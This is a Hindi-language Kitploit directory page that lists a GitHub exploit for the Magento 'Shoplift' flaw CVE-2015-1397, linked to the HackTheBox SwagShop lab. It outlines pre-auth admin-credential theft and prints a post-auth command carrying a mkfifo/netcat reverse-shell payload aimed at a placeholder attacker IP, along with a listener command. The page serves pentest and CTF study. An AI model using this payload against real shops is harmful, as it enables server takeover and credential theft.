Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
उपकरण/GitHubGitHub/wytchwulf/cve-2015-1397-magento-shoplift
पेलोड जनरेशनभेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणCTFपेनिट्रेशन टेस्टिंग
GitHubwytchwulf/cve-2015-1397-magento-shoplift

CVE-2015-1397-Magento-Shoplift

Magento CMS में CVE-2015-1397 के लिए शोषण स्क्रिप्ट, जिसमें व्यवस्थापक क्रेडेंशियल प्राप्त करने के लिए प्री-ऑथ शोषण और रिवर्स शेल निष्पादन के लिए पोस्ट-ऑथ RCE मॉड्यूल शामिल है।

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
रिपॉजिटरी देखें
12 साल पहलेअभी तक समीक्षित नहीं
साझा करें

CVE-2015-1397-Magento-Shoplift

भेद्यता विवरण

HackTheBox - SwagShop में देखी गई भेद्यता

चरण 1 = exploit.py

Magento CMS डैशबोर्ड के लिए एडमिनिस्ट्रेटर क्रेडेंशियल प्राप्त करें

चरण 2 = post_auth.py

exploit.py से प्राप्त क्रेडेंशियल्स को post_auth.py में जोड़कर यह चलाएँ:

root@kitploit:~
python3 post_auth.py http://TARGET.SITE/index.php/admin "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc YOUR_IP 4444 >/tmp/f"

लिसनर:

root@kitploit:~
nc -lvnp 4444
टूल डाउनलोड करें